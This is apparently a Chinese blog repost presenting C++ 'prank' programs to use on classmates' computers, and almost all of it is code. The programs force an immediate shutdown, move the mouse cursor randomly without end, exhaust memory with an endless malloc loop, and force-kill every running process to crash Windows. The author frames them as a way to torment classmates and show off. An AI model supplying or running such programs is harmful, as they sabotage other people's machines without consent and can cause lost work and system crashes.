当前位置:   article > 正文

C++整人代码(直接关机,卡爆内存,鼠标乱飞,致命蓝屏),整死你的同学,装X必用_c++ 蓝屏代码

c++ 蓝屏代码

1.直接关机

#include<bits/stdc++.h>
#include<windows.h>
using namespace std;
int main()
{
    system("shutdown /p");
}
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7

2.鼠标乱飞

#include<bits/stdc++.h>
#include<windows.h>
using namespace std;
int main()
{
    int x1=GetSystemMetrics(SM_CXSCREEN);
    int y1=GetSystemMetrics(SM_CYSCREEN);
    srand(time(0));
	for(;;)
    	SetCursorPos(rand()%x1,rand()%y1);
}
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11

3.卡爆内存

#include<bits/stdc++.h>
#include<windows.h>
using namespace std;
int main()
{
    for(;;)
    malloc(1000000);  
}
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8

直接蓝屏(不建议用,威力太大)

#include<bits/stdc++.h>
#include<windows.h>
using namespace std;
int main()
{
    system("taskkill /f /fi 'pid ge 1'");
	return 0;
}

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9

够不够用呢,这威力已经够大了,估计你的同学此时已经蒙了吧

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/你好赵伟/article/detail/853790
推荐阅读
相关标签
  

闽ICP备14008679号